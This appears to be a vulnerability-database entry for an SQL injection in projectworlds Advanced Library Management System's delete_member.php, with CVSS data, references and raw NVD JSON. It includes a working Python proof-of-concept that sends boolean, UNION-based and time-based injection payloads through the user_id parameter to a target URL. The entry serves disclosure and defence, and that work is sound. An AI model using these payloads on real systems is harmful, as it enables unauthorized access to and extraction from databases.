CVE-2025-14210

Description

A security vulnerability has been detected in projectworlds Advanced Library Management System 1.0. Affected is an unknown function of the file /delete_member.php. Such manipulation of the argument user_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:projectworlds:advanced_library_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

projectworlds Advanced Library Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-14210 SQL Injection PoC
# Target: projectworlds Advanced Library Management System 1.0
# File: /delete_member.php
# Parameter: user_id

def exploit_sqli(target_url, payload):
    """
    SQL Injection exploit for CVE-2025-14210
    Extract database version using UNION-based injection
    """
    # Construct malicious URL with SQL injection payload
    # Basic payload to test vulnerability
    test_payload = "1' OR '1'='1"
    
    # UNION-based payload to extract database information
    union_payload = "1' UNION SELECT NULL,version(),user(),database()-- -"
    
    # Time-based blind SQL injection payload
    time_payload = "1' AND SLEEP(5)-- -"
    
    try:
        # Test basic injection
        params = {'user_id': test_payload}
        response = requests.get(f'{target_url}/delete_member.php', params=params, timeout=10)
        print(f'[+] Testing basic injection: {response.status_code}')
        
        # Extract database version using UNION
        params = {'user_id': union_payload}
        response = requests.get(f'{target_url}/delete_member.php', params=params, timeout=10)
        print(f'[+] UNION injection response length: {len(response.text)}')
        
        # Time-based blind injection
        params = {'user_id': time_payload}
        response = requests.get(f'{target_url}/delete_member.php', params=params, timeout=15)
        print(f'[+] Time-based injection response time: {response.elapsed.total_seconds()}s')
        
        return True
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-14210.py <target_url>')
        print('Example: python cve-2025-14210.py http://target.com')
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    print(f'[*] Targeting: {target}')
    print(f'[*] Exploiting CVE-2025-14210 SQL Injection')
    exploit_sqli(target, '')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14210
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14210
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14210/
[4] VulDB https://vuldb.com/cve/CVE-2025-14210
[5] https://github.com/rassec2/dbcve/issues/9
[6] https://vuldb.com/?ctiid.334653
[7] https://vuldb.com/?id.334653
[8] https://vuldb.com/?submit.700948

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14210", "sourceIdentifier": "[email protected]", "published": "2025-12-08T03:16:15.140", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in projectworlds Advanced Library Management System 1.0. Affected is an unknown function of the file /delete_member.php. Such manipulation of the argument user_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectworlds:advanced_library_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "10EA1074-EEBC-4A5A-97F7-34C5E3181CB8"}]}]}], "references": [{"url": "https://github.com/rassec2/dbcve/issues/9", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334653", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334653", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.700948", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}